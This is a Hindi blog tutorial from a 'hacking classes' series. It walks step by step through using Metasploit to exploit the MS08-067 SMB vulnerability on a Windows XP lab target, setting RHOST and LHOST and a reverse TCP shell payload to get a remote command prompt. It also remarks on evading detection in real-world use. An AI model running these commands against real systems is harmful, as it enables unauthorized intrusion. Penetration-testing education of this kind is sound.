हेल्लो दोस्तों ,
काफी दिनों  के बाद, हम अपनी इस hacking classes को आगे बढ़ाते हुए आज METASPLOIT FRAMEWORK के बारे में जानेंगे।
Ok, तो सबसे पहले जानते है की आखिर Metasploit Framework क्या है।

Metasploit Framework:-
Metasploit Framework एक  Kali Linux का tool है जो किसी भी मशीन की  vulnurbilities को  use करके उसे Exploit यानी की Hack करने में मदद करता है।
agar आपने मेरे पिछले tutorials को पढ़ा हो तो आपको याद होगा की जब हमने अपने Windows XP के target को scan किया था तो हमे एक Vulnerbility MS08-067 मिली थी। हम इसी  Vulnerbility को use करके Metasploit से system को hack करेंगे।
Metasploit को start कैसे करे:-

metasploit को start करने के लिए आपको सबसे पहले
Applications -> Exploitation Tools -> Metasploit Framework

पर Click करना है। उसके बाद Metasploit start हो जाएगा और आपको कुछ ऐसी screen दिखाई देगी।  

जैसा की आपने इसमें देखा है की अभी इसमें 1467 Exploits, 432 Payloads Installed है। ये Exploits ही हमे Use करने है अपने Target पर। OK अभी हम Metasploit को एक Vulnerability MS08-67 को Exploit  करने के लिए उसे कर रहे है। Metasploit हमे इसके बारे में Details दे सकता है। उसके लिए हमे Metasploit के Inbuilt Feature Search का Use करना होगा
msf > search ms08-67

तो हमने जब ये सर्च किया तो हमे इसका Correct Module नाम पता चला जो की ms08_067_netapi है। अब अगर इसके बाद आप कमांड डाले :=
msf > info exploit/windows/smb/ms08_067_netapi
जैसा की आपने देखा की इस Command के बाद इस Module की सारी Information Show हो गयी है। इसमें सबसे पहले इसके बारे में इनफार्मेशन दी है। उसके बाद प्लेटफार्म में बताया की ये किसके लिए है जैसा की इसमें विंडोज है। रैंक बताई गयी है। उसके बाद इसके टार्गेट्स दिखाए गए है। फिर इसमें Basic Options लिस्ट दी गयी है। इसमें आपको कुछ Options दिए है जिसे हमे अपने टारगेट के हिसाब से सेट करना होता है।

RHOST में हमे हमारे टारगेट का IP Address सेट करना होता है। इसमें पूरी डिटेल्स हम बाद में पढ़ेंगे। उसके बाद Payload Information है जिसमे कुछ इनफार्मेशन होती है जो Metasploit Exploit के लिए कोन सा Payload इस्तेमाल करना है बताता है।
Description :- ये किसी Vulnerability की और भी ज्यादा डिटेल्स देता है।
Reference :- इसमें ऑनलाइन Vulnerability Database के लिंक दिए होते है। यहाँ से भी आप किसी Vulnerability की डिटेल्स पढ़ सकते है।
OK, अब हमे सही Module पता है, तो अब हमे Metasploit को इस Module को इस्तेमाल करने की कमांड देनी होगी।
msf > use windows/smb/ms08_067_netapi
Setting Module Options

OK, अब हमे Metasploit को कुछ इनफार्मेशन देनी होगी जिससे हम अपने टारगेट की Vulnerability को Exploit कर सके। सबसे पहले हम Metasploit की सेटिंग्स चेक करते है की आखिर उसमे सेट क्या है। उसके लिए हमे कमांड टाइप करनी है:-
msf exploit(ms08_067_netapi) > show options
जैसा की आपको ऊपर Screen-Shot में दिखाया गया है, इसमें 3 Options है।
RHOST :- इसमें हमे अपने टारगेट का IP Address डालना होता है। सबसे पहले हमे इसे सेट करना होगा अपने टारगेट पर उसके लिए आपको कमांड डालनी है।
 set <option to set> <value to set> 
 set RHOST 192.168.79.160
 [image set ]
RPORT :- इसमें हमे PORT डालना होता है Attack के लिए। PORT जैसे की 80, 442, 21 so on अभी हम अपने Case में इसे Change नहीं करेंगे और  Default 445 ही रहने देंगे।

SMBPIPE :- जैसे की हमने RPORT में Value Change नहीं की थी वैसे ही इसमें भी चेंज नहीं करेंगे और Default ही रहने देंगे।
Exploit Target :- Exploit Target 0 Automatic Targetting पे सेट होता है। ये Operating System और Version को टारगेट करता है। आप खुद भी इसे सेट कर सकते है और देख सकते है की इसमें कितने टारगेट है।
msf exploit(ms08_067_netapi) > show targets
हमे पता है की हमारा टारगेट Windows XP SP3 है, But ये भी इतना आसान नहीं होता तो इसे भी 0 पर ही रहने दे, ताकि ये अपने आप टारगेट को सेलेक्ट कर सके।
Payloads / Shellcode
जैसा की हमने अभी Show Options कमांड में देखा की हमारा टारगेट भी लिस्ट में है, अब बस हमे अटैक करने की जरुरत है। लेकिन हमने अभी तक हमने Exploit को ये नहीं बताया की हमारे टारगेट के Exploited होने के बाद वो क्या करे। ये सब करने के लिए Metasploit में पहले से ही Payloads सेट करना काफी आसान हो जाता है हमारे लिए।

Metasploit के Payloads के बारे में हम अगले Tutorials में पढ़ेंगे। Payloads देखने के लिए टाइप करे :
msf exploit(ms08_067_netapi) > show payloads
Check Run:-
OK अभी समझने के लिए हम अभी Default Payload पर ही Exploit करेंगे अपने टारगेट को तो उसके लिए हमे अब बस exploit कमांड डालनी है
msf exploit(ms08_067_netapi) > exploit
आपने देखा की अब यह से Meterpereter जो की Meta-interpreter  की Short Form है स्टार्ट हो गयी है। इससे अब हम अपने टारगेट के साथ कई सारी चीजे कर सकते है, लेकिन ये सब हम बाद में डिटेल में पढ़ेंगे।
Note:- आपने देखा की Metasploit Port 4444 को इस्तेमाल कर रहा है। अभी जो हम अपने टारगेट को Exploit कर रहे है तब तक तो ये सही है, लेकिन जब हम Real World में इसका इस्तेमाल  करेंगे तो हमारा टारगेट Metasploit के Connection को Drop कर देगा क्योकि उसे पता चल जाएगा की ये Metasploit है।

अभी हम ज्यादा कुछ नहीं करेंगे, इसके बाद अब हम Exit Command enter के इसे Close कर देंगे।

Setting a Payload Manually
Ok, अब हम Manually एक Payload Select करेंगे। Payload Set करने के लिए :-
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
क्योकि ये एक Reverse Shell है तो हमे टारगेट को बताना पड़ेगा की उसे Shell कहा पर Send करने है। उसके लिए हमे अपनी यानि की Kali Linux का IP Address Set करना होगा।
अब हमे LHOST में अपना यानी की Attacker का IP Address डालना है, Kali Linux का IP Address देखने के लिए, Type करे
ipconfig
जैसा की मेरी Kali Linux का IP Address 192.168.79.130 है तो हम ये डालेंगे :-
set LHOST 192.168.79.130

अब फिर से Exploit Command डाल के देखे
Ohhh… Congratulations,  आपने Windows XP को Successfully Exploit कर लिया है। अब आपकी स्क्रीन पर Windows XP का Command Prompt Open हो गया है, इसमें आप कोई भी Windows की Command डाल  कर उसे Execute कर सकते है :
इसे बंद करने के लिए CTRL + C दबाये  Y दबाकर Enter का बटन दबाए। 
तो ये था  Metasploit का पहला और Basic Tutorial आगे इसके और भी Uses आपको बताये जाएंगे। इसे सिखने के लिए आपको इसे यहाँ पर पढ़कर 2-3 बार Try जरूर करे, आपको इजी लगेगा।
इसमें काफी मेहनत लगी Woofff मेरे ब्लॉग का जरूर शेयर करे दोस्तों  हम आगे भी और भी हैकिंग के Tutorials  करेंगे। 
Happy Hacking…   
आप इस Tutorial को YouTube  पर भी देख सकते है।

  

Leave a Reply

Your email address will not be published. Required fields are marked *